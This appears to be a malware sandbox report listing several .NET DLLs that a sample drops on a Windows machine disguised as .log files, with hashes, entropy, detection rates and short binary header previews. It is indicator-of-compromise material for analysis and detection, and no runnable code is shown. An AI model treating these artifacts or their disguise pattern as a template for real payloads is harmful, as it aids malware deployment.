C:\Users\user\Desktop\JEszLdwN.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JGbOwXPR.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JOnPlldQ.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JPUzzdBp.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JiGGnouG.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KGLrCwIr.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KPopdtuG.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KozQBPIf.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\LQfwyfBd.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LTSgQlLh.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\MLpHgvqI.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MQtollac.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MwRFEUPK.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NJvfkcmc.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NWmyzMoB.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OKWQGJri.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OwBiJsIk.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PhxVLhaD.log

Download File

Process:	C:\Users\user\Desktop\FuWRu2Mg82.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PpJWzvoC.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\PqqGNnMb.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QkZgZWxz.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\QynQebMf.log

Download File

Process:	C:\Recovery\axnJvpyQnMRKSw.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

